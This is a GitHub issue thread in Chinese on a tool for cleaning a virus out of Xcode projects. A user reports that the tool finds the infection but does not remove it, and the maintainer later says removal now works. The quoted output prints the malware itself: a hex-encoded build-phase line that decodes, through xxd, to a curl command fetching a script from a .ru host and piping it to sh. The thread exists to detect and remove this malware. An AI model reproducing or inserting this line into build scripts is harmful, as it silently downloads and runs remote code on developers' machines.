### ISSUE TITLE
删除不了病毒代码

### ISSUE THREAD

**Issue by fanlilinSaber** [rowliny/CleanXcodeProjVirus#1]
存在加密后的病毒:
	"# This output is used by Xcode outputs to avoid re-running this script phase.

echo \"6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f
61646f626566696c652e72752f61207c207368202d732066616c73650a\" | xxd -p -r | sh >/dev/null 2>&1 || true
	"
	16进制转ascii后的真实病毒:curl --max-time 8 -sk https://adobefile.ru/a | sh -s false

手动确认后随意输入后继续:
	2022-05-25 20:03:30 打印个时间戳意思一下,免得你以为卡死了
	2022-05-25 20:03:30 打印个时间戳意思一下,免得你以为卡死了
	2022-05-25 20:03:30 打印个时间戳意思一下,免得你以为卡死了
清除了0次病毒

**Comment by rollin0-0** [comment]
目前只有查找功能，尽快增加移除功能

**Comment by rollin0-0** [comment]
> ```
> 存在加密后的病毒:
> "# This output is used by Xcode outputs to avoid re-running this script phase.
> ```
> 
> echo "6375726c202d2d6d61782d74696d652038202d736b2068747470733a2f2f 61646f626566696c652e72752f61207c207368202d732066616c73650a" | xxd -p -r | sh >/dev/null 2>&1 || true " 16进制转ascii后的真实病毒:curl --max-time 8 -sk https://adobefile.ru/a | sh -s false
> 
> 手动确认后随意输入后继续: 2022-05-25 20:03:30 打印个时间戳意思一下,免得你以为卡死了 2022-05-25 20:03:30 打印个时间戳意思一下,免得你以为卡死了 2022-05-25 20:03:30 打印个时间戳意思一下,免得你以为卡死了 清除了0次病毒

现在能移除了
